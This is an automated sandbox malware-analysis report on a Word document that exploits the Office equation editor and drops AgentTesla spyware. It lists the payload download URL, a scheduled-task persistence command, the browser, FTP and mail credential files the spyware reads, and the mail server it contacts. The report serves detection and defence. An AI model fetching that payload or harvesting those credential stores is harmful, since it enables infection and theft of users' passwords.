                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeProcess created: C:\Users\user\AppData\Roaming\missijng.exe C:\Users\user\AppData\Roaming\missijng.exeJump to behavior
                      Source: missijng.exe, 00000007.00000002.2404845228.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: missijng.exe, 00000007.00000002.2404845228.0000000000E30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: missijng.exe, 00000007.00000002.2404845228.0000000000E30000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\user\AppData\Roaming\missijng.exeQueries volume information: C:\Users\user\AppData\Roaming\missijng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeQueries volume information: C:\Users\user\AppData\Roaming\missijng.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2148667814.0000000003239000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2404465078.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 2932, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 3024, type: MEMORY
                      Source: Yara matchFile source: 4.2.missijng.exe.3525c80.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.missijng.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.missijng.exe.3525c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.missijng.exe.34201d0.7.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\missijng.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: Yara matchFile source: 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 3024, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2148667814.0000000003239000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2404465078.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 2932, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: missijng.exe PID: 3024, type: MEMORY
                      Source: Yara matchFile source: 4.2.missijng.exe.3525c80.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.missijng.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.missijng.exe.3525c80.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.missijng.exe.34201d0.7.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery311Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion14SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion14Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 348466 Sample: Quotation-20441.doc Startdate: 04/02/2021 Architecture: WINDOWS Score: 100 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Antivirus detection for URL or domain 2->50 52 15 other signatures 2->52 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 336 18 2->12         started        14 EQNEDT32.EXE 2->14         started        process3 dnsIp4 36 globalteamacademy.com 43.252.37.193, 49167, 80 NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloud Malaysia 7->36 30 C:\Users\user\AppData\Roaming\missijng.exe, PE32 7->30 dropped 32 C:\Users\user\...\g1OsYVWymzBgTTt[1].exe, PE32 7->32 dropped 60 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->60 16 missijng.exe 3 7->16         started        file5 signatures6 process7 file8 26 C:\Users\user\AppData\Roaming\ROGxuzog.exe, PE32 16->26 dropped 28 C:\Users\user\AppData\Local\...\tmp45B8.tmp, XML 16->28 dropped 38 Multi AV Scanner detection for dropped file 16->38 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->40 42 Machine Learning detection for dropped file 16->42 44 2 other signatures 16->44 20 missijng.exe 4 16->20         started        24 schtasks.exe 16->24         started        signatures9 process10 dnsIp11 34 mail.privateemail.com 198.54.122.60, 49168, 49169, 49171 NAMECHEAP-NETUS United States 20->34 54 Tries to steal Mail credentials (via file access) 20->54 56 Tries to harvest and steal ftp login credentials 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Quotation-20441.doc47%VirustotalBrowse
                      Quotation-20441.doc49%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\ROGxuzog.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\missijng.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\g1OsYVWymzBgTTt[1].exe27%ReversingLabsWin32.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\ROGxuzog.exe27%ReversingLabsWin32.Trojan.AgentTesla
                      C:\Users\user\AppData\Roaming\missijng.exe27%ReversingLabsWin32.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      7.2.missijng.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      globalteamacademy.com7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      https://sectigo.com/CPS00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                      http://HlWPVIg1XOk4EZ.org0%Avira URL Cloudsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://www.certifikat.dk/repository00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.trustcenter.de/guidelines00%URL Reputationsafe
                      http://www.trustcenter.de/guidelines00%URL Reputationsafe
                      http://www.trustcenter.de/guidelines00%URL Reputationsafe
                      http://www.trustcenter.de/guidelines00%URL Reputationsafe
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3TS.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe10%VirustotalBrowse
                      http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exe100%Avira URL Cloudmalware
                      http://tempuri.org/databaseSystemDataSet.xsd0%Avira URL Cloudsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                      http://www.digsigtrust.com/0%Avira URL Cloudsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.comsign.co.0%Avira URL Cloudsafe
                      http://www.firmaprofesional.com00%URL Reputationsafe
                      http://www.firmaprofesional.com00%URL Reputationsafe
                      http://www.firmaprofesional.com00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://Gspsks.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      globalteamacademy.com
                      		43.252.37.193
                      		truetrueunknown
                      mail.privateemail.com
                      		198.54.122.60
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://HlWPVIg1XOk4EZ.orgtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://globalteamacademy.com/docct/pal/g1OsYVWymzBgTTt.exetrue
                        • 10%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.certicamara.com/certicamaraca.crl0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                          		high
                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://127.0.0.1:HTTP/1.1missijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://DynDns.comDynDNSmissijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.oces.certifikat.dk/oces.crl0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://sectigo.com/CPS0missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.chambersign.org/chambersroot.crl0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.entrust.net/server1.crl0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                            		high
                            http://ocsp.sectigo.com0missijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hamissijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.entrust.net03missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://cps.chambersign.org/cps/chambersroot.html0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.dnie.es/dpc0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.certifikat.dk/repository0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.certicamara.com/certicamaraca.missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                              		high
                              http://www.trustcenter.de/guidelines0missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://mail.privateemail.commissijng.exe, 00000007.00000002.2405153029.000000000250A000.00000004.00000001.sdmpfalse
                                		high
                                http://www.certplus.com/CRL/class3TS.crl0missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.missijng.exe, 00000004.00000002.2151786703.0000000005250000.00000002.00000001.sdmp, missijng.exe, 00000007.00000002.2409005501.0000000005D10000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.certicamara.com/certicamaraca.crl0;missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/databaseSystemDataSet.xsdmissijng.exe, missijng.exe, 00000007.00000000.2146913218.0000000000D22000.00000020.00020000.sdmp, ROGxuzog.exe.4.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.xrampsecurity.com/XGCA.crl0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.digsigtrust.com/missijng.exe, 00000007.00000002.2409355776.0000000006EE8000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.%s.comPAmissijng.exe, 00000004.00000002.2151786703.0000000005250000.00000002.00000001.sdmp, missijng.exe, 00000007.00000002.2409005501.0000000005D10000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		low
                                    http://www.comsign.co.missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.firmaprofesional.com0missijng.exe, 00000007.00000002.2409395289.0000000006F80000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://ocsp.entrust.net0Dmissijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemissijng.exe, 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmpfalse
                                      		high
                                      https://secure.comodo.com/CPS0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                                        		high
                                        http://Gspsks.commissijng.exe, 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipmissijng.exefalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://servername/isapibackend.dllmissijng.exe, 00000007.00000002.2409452001.00000000082A0000.00000002.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://crl.entrust.net/2048ca.crl0missijng.exe, 00000007.00000002.2409332869.0000000006EA0000.00000004.00000001.sdmpfalse
                                          		high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          43.252.37.193
                                          		unknownMalaysia
                                          		45144NETONBOARD-MYNetOnboardSdnBhd-QualityReliableCloudtrue
                                          198.54.122.60
                                          		unknownUnited States
                                          		22612NAMECHEAP-NETUSfalse

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:348466
                                          Start date:04.02.2021
                                          Start time:09:18:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 27s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:Quotation-20441.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@12/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 1% (good quality ratio 0.6%)
                                          • Quality average: 40.3%
                                          • Quality standard deviation: 35%
                                          HCA Information:
                                          • Successful, ratio: 99%
                                          • Number of executed functions: 47
                                          • Number of non-executed functions: 8
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Active ActiveX Object
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 8.253.204.120, 8.248.113.254, 8.248.149.254, 8.248.115.254, 8.241.123.126
                                          • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          09:18:38API Interceptor695x Sleep call for process: EQNEDT32.EXE modified
